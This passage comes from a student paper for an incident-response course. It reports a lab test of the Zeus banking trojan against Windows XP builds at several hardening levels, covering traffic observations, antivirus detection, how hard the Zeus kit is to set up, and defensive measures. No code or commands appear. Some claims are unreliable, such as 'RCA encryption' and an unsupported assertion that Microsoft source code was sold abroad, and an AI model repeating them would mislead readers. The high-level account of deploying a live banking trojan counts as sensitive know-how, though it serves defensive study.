in order to get to more exact and refine details out of it. Wireshark provided the simple

relationship amongst the infected host and the web server. The payloads were encrypted

(assuming this since there wasn’t any plaintext) with methods (Zeus uses RCA encryption)

within and the Ŗzse.exeŗ configuration and web install Ŗindex.php.ŗ Both executions required

the public key to process the automatic configurations. Wireshark shows the traffic type was

mainly http connections and many different ports were attempted. We could use some

cryptography tools in this experiment and see if we could reveal the payloads since we do

have the encryption mechanism and public key. We would need to discover the private key of

the Zeus program. That process could take a lot of work and may not be possible or feasible.

The security levels of the XP systems were simple to configure and was basic to

complex. There was the standard build without a service pack and no AV then a moderate

protected XP and then to the highest possible harden XP system. The security flaws were not

found on the lowest baseline of XP and no AV was installed. So something changed from the

later builds of XP that have service pack 3 or higher to allow an open vulnerability related to

what Zeus could penetrate through. All the systems with AV were capable of detecting and

rejecting this version of Zeus however media literature shows that further developed Zeus

platforms will elude AV. The mechanism which would allow this is to be successful is based

on the random encryption practices that Zeus has been implementing.

The first line of defense was AV. I did not anticipate that the AV would prevent the

executable from running but it does just that. It worked this time but will it later? To improve

upon this experiment I would like to setup a different trial set identical to this one but

subtracting the known suspects that will refuse the infection based on having AV installed.

The next layer of defense after AV is having full updates and removing unused services and

closing unused ports. After that you can take another step and secure and restrict system level

scripts and executables that can operate at the system level. How well would the DoD system

at low and high classification protection without the AV installed do against the Zeus attack?

The ease of use in my experience with this program is a rating of Ŗdifficultŗ to

configure and use. Many software vendors charge you for product support usually do so

because their product is not as intuitive as running office suite products. I have experience

with web development and know php and MySQL well enough to develop a working site that

is useful. This type of project was not out of my field of expertise. It was hard to determine if

you are missing a critical file. There weren’t any help instructions to tweek possible web

service configurations. There weren’t any help files or forums to guide you through the

process. I did not have an easy time locating a working copy of the software and did get a

version that was not the original one or the latest one. You have to pay for it all and find out

where to pay to. The common files that I had were from a basic template or modified

experimental one. I can’t be sure either way. There wasn’t any MD5 hash to compare to see

what I was suppose to be working with and if my set of files were altered or not. I have done

the best with what I found. Getting it all going is difficult.

After you get over the stumps the rest of it is easy. It does have that kiddie script that

builds the required functioning executables and has the self configuring database along with

the ready to go website server. The website worked but it was an empty shell since the data

never populated. Did I have it configured right or wrong or is there a time delay before the

data collector sends it at Ŗmŗ minutes or Ŗhŗ hours later. I gave it almost ten hours and saw no

data online from the command site.

The countermeasures to prevent this infection in this case scenario are simple. Use a

good AV and keep the signature files up to date. However the future implementation of Zeus

will defeat or has defeated AV. Other steps must be taken to protect from host from infection.

Dell SecureWorks had some good advice in how to protect yourself from being a victim to the

goal of Zeus stealing your banking information. SecureWorks suggest Ŗbusinesses and home

users carry out online banking and financial transactions on isolated workstations that

are not used for general Internet activities, such as web browsing and reading email

which could increase the risk of infection.” For networks and home users the solutions

will vary.

To combat malware you need an infrastructure with built in security. There is a

lot of sensitive data out there. How useful is the data if the data can’t beviewed? It would

be worthless and the effort would be wasted. I agree with the posting in the forum from

our class related to the Germany citation10 that would impose a fine to users that didn’t

secure their wireless routers if their router was to be used as the dummy network to

commit a crime. Along similar lines the more doors we close or secure the less

opportunity there is out there for criminal to go through. Pretty Good Privacy (PGP)11 is

free and not easy to configure but works well to secure data files and emails. In advance

firewall appliances or software firewalls you should implement a backhole list or a proxy

that filtered known websites and domains of Zeus and denied access to them. There is a

10 http://www.msnbc.msn.com/id/42740201/ns/technology_and_science-wireless/

http://news.yahoo.com/s/ap/20110424/ap_on_hi_te/us_wi_fi_warning 11

http://www.openpgp.org/

http://www.msnbc.msn.com/id/42740201/ns/technology_and_science-wireless/

http://news.yahoo.com/s/ap/20110424/ap_on_hi_te/us_wi_fi_warning


supported list for Zeus called “abuse.ch ZeuS removal list.12” The proper security

architectures need to be designed and used throughout the many networks to prevent

the bots from spreading and the bots from collecting useful information.

The current Microsoft OS is not encrypting things in the registry and exposing a

lot of system information. Operating systems should be designed to switch to an isolated

read-only state for sensitive web browsing or banking which would prevent storage to

happen locally to the disk the OS resides on. Key-loggers and screenshots being taken

from rogue malware programs that inject themselves to root system files. There reside

there and are usually capturing and storing from users interative actions on the system.

If the the write permsission don’t exist then those files can never been intercepted and

executed upon to be sent out to a master server. We need a new Microsoft that hasn’t

had their source code sold to foreign countries and reversed engineered by hackers. The

next generation of operating systems needs to have a much greater security as of part of

core of the product.

The most impact to prevention of viruses, malware, Trojans, and phishing

schemes is proper network security personnel training. Home users may not get this

annual requirement that corporations usually mandate. In addition to home users are

those small business such as dental and doctor offices that don’t employ security in their

policies for network usage. Zeus works with user interaction for installation. When the

user agrees to click yes and run to install the Zeus begins its process. Alternatively

12

https://zeustracker.abuse.ch

https://zeustracker.abuse.ch/

perhaps some phishing scheme is devised to trick users to enter their information which

activates the Zeus program. User training is important but if the user is tricked and their

files are encrypted to appropriate levels then the data will be useless to the malware.

A solution today that prevents malware from the dummy user is to always use a

Linux version operating system and booting from the CD-Rom option which is a read

only selection. You know for certain when you load the CD that your system root is not

changed and not affected by malware since malware can’t be installed on the CD device.

You know when you are browsing the web and banking that you don’t have additional

services in the background tracking your activity and sending it to a malware bot for

further malicious activity.

References

DoD Gold Disk

http://www.disa.mil/services/ia.html

Retina

http://www.eeye.com/Retina

IDA Pro5

http://www.hex-rays.com/idapro/

Wireshark

http://www.wireshark.org

Dell published an article on Zeus on March 11, 2010

http://www.secureworks.com/research/threats/zeus/?threat=zeus

Utilities from Sysinternals Suite

http://technet.microsoft.com/en-us/sysinternals/bb842062

InCtrl5

http://simontodd.com/2010/02/inctrl-5-application-analysys-tool-download-and-enjoy/

WinMerge

http://winmerge.org/

verclsid.exe is an open MS vulnerability

http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx

abuse.ch ZeuS removal list

https://zeustracker.abuse.ch

Germany Wireless Fine

http://www.msnbc.msn.com/id/42740201/ns/technology_and_science-wireless/

http://news.yahoo.com/s/ap/20110424/ap_on_hi_te/us_wi_fi_warning

Good Privacy (PGP)


CIS 6395 Incident Response Technologies How effective are...

Documents

Transcript of CIS 6395 Incident Response Technologies How effective are...